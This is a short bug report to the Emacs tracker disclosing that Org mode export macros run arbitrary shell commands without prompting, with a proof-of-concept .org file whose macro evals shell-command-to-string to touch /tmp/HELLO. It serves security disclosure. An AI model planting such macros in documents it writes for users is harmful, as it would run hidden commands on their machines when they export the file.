|
From: | Rafael Ramirez Morales |
Subject: | bug#48676: Arbitrary code execution in Org export macros |
Date: | Thu, 27 May 2021 09:02:20 +0200 |
Package: emacs,org-mode
Version: 28.0.50
Severity: important
Tags: security
emacs -Q hello.org, where hello.org contains:
#+macro: hello (eval (shell-command-to-string "touch /tmp/HELLO"))
Hello. {{{hello}}}
Then:
M-x org-export-dispatch
t A
-> now /tmp/HELLO exist, with no prompting.
This seems contrary to normal Emacs practice for risky local variables,
and to the section "Code Evaluation and Security Issues" in the Org manual
(which does not mention macros).
[Prev in Thread] | Current Thread | [Next in Thread] |